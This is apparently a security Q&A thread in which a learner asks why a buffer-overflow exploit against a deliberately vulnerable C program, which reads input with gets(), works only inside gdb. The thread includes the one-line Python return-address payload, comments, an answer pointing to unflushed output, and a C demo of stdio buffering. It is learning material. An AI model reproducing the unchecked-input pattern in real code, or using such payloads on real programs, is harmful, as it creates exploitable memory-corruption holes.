
tl;dr: Why does my exploit only work inside gdb?

I'm very new to the buffer overflow and exploit development fields. To improve my skills based on a series of papers and videos, I wrote this simple C program:

Note: I disabled ASLR

I believe that my question is different from this one: "Buffer overflow exploit works with gdb but not without", because that author seems to have ASLR enabled.


#include <stdio.h>
#include <string.h>

/* Target of the exploit: only reached on the intended path when the
   password matches. */
void granted()
{
    printf ("\nAccess granted\n");
    return;
}

int main()
{
    char password[104];
    printf ("Enter your password: ");
    gets(password);   /* no length check: this is the deliberate overflow */

    if (strcmp(password,"p@$$w0rd"))
    {
        printf("\nFailed!!");
    }
    else
    {
        granted();
    }

    return 0;
}

As far as I know, there is a little bug: it is possible to enter many more than 103 chars.

My first exploit objective was to redirect the execution flow to the granted function.

To generate the exploit, I used the following command:

python -c 'print "A"*100+"\x9b\x84\x04\x08"+"BBBB"' > payload-access-granted

me@computer:~$ gdb bof3.bin 
(gdb) r < payload-access-granted 
Starting program: /home/me/bof3.bin < payload-access-granted
Enter your password: 
Failed!!
Access granted

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

As you can see, the payload did what was expected: it jumped to the granted function. The exploit is working... but

Outside gdb:

me@computer:~$ ./bof3.bin < payload-access-granted 
Enter your password: 
Segmentation fault (core dumped)

So, why does this occur? What didn't I do correctly?

mcgyver5
Joao Daniel
  • What arguments and options did you use to compile the source .c to bof3.bin? Please include all libraries loaded by gdb. Is it possible you have more than one copy of bof3.bin in different directories? – this.josh Apr 20 '17 at 05:43
  • Is `0x0804849b` address of granted()? – gtux Apr 20 '17 at 09:57
  • What operating system are you running this on? I can't get your code to break. How did you compile the binary, can you provide the gcc line? – RoraΖ Apr 20 '17 at 18:03
  • This is not a duplicate question, IMHO. NOP sled will not work here since, there is no shellcode insertion done. OP is trying to jump to an address in text section, hence, no need for a nop sled to guess the address. – gtux Apr 25 '17 at 06:48
  • Loading the dumped core into gdb will show you why. Possibly it is merely due to it segfaulting on 0x42424242 before the access granted string is flushed to screen. – wireghoul Jul 15 '17 at 04:36

1 Answer


Most likely, it is working, but the program crashes with the Access Granted printf not having been flushed to the screen. Crashing on SIGSEGV does not cause buffers to be flushed. Add fflush(stdout); after the printf call in granted, and you'll likely get your desired behavior.

David
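The mechanism the answer describes, as an added example that is not part of the original answer or the asker's program: a child process prints the same "\nAccess granted\n" string into a stdio stream that is backed by a pipe (fully buffered, the same mode glibc picks for a redirected or piped stdout), optionally flushes, and is then killed by SIGSEGV. The parent counts how many bytes actually arrived. The crash is simulated with raise(SIGSEGV) rather than with the real return into 0x42424242; the message text is copied from the page's granted(), and the function and variable names are mine. Linux/POSIX is assumed.

```c
#define _DEFAULT_SOURCE   /* pipe, fork, fdopen, setrlimit on glibc with a strict -std */
#include <signal.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Same bytes the page's granted() prints (constructed from the post). */
static const char GRANTED_MSG[] = "\nAccess granted\n";

/* Print GRANTED_MSG in a child whose output stream is a pipe, then kill the
 * child with SIGSEGV, the way the ret into 0x42424242 does. Returns the
 * number of bytes the parent actually receives, or -1 if setup fails. */
long bytes_received_after_crash(int do_flush)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    fflush(stdout);                 /* keep the parent's pending output out of the child */
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {                 /* child: plays the role of bof3.bin */
        close(fds[0]);
        struct rlimit rl = { 0, 0 };
        setrlimit(RLIMIT_CORE, &rl);            /* no core file litter from the demo */
        FILE *out = fdopen(fds[1], "w");        /* fresh stream on a pipe: fully buffered */
        if (!out)
            _exit(1);
        fprintf(out, "%s", GRANTED_MSG);        /* bytes sit in a user-space buffer only */
        if (do_flush)
            fflush(out);                        /* hand them to the kernel before dying */
        signal(SIGSEGV, SIG_DFL);
        raise(SIGSEGV);                         /* default action: terminate; no exit
                                                   handlers and no stdio flush run */
        _exit(2);                               /* not reached */
    }

    /* parent: drain the pipe until the child's write end closes */
    close(fds[1]);
    char buf[64];
    long total = 0;
    ssize_t n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0)
        total += n;
    close(fds[0]);

    int status;
    waitpid(pid, &status, 0);
    return total;
}

int main(void)
{
    printf("no fflush before SIGSEGV: %ld bytes delivered\n", bytes_received_after_crash(0));
    printf("fflush before SIGSEGV:    %ld bytes delivered\n", bytes_received_after_crash(1));
    return 0;
}
```

Without the flush nothing reaches the parent; with it all 16 bytes do. Two caveats for anyone checking this against bof3.bin: glibc line-buffers stdout when it is a terminal, so the trailing newline in granted()'s message would normally flush it there, while the "Failed!!" line, which has no trailing newline, is the one most likely to be lost; and fflush(stdout), setvbuf(stdout, NULL, _IONBF, 0) at the top of main, or running the binary under stdbuf -o0 are equivalent fixes. The definitive check is the one wireghoul's comment suggests: load the core into gdb (gdb ./bof3.bin core, then info registers eip). If eip is 0x42424242, granted() did run and only the output was lost; any other value means the control flow itself differed outside gdb.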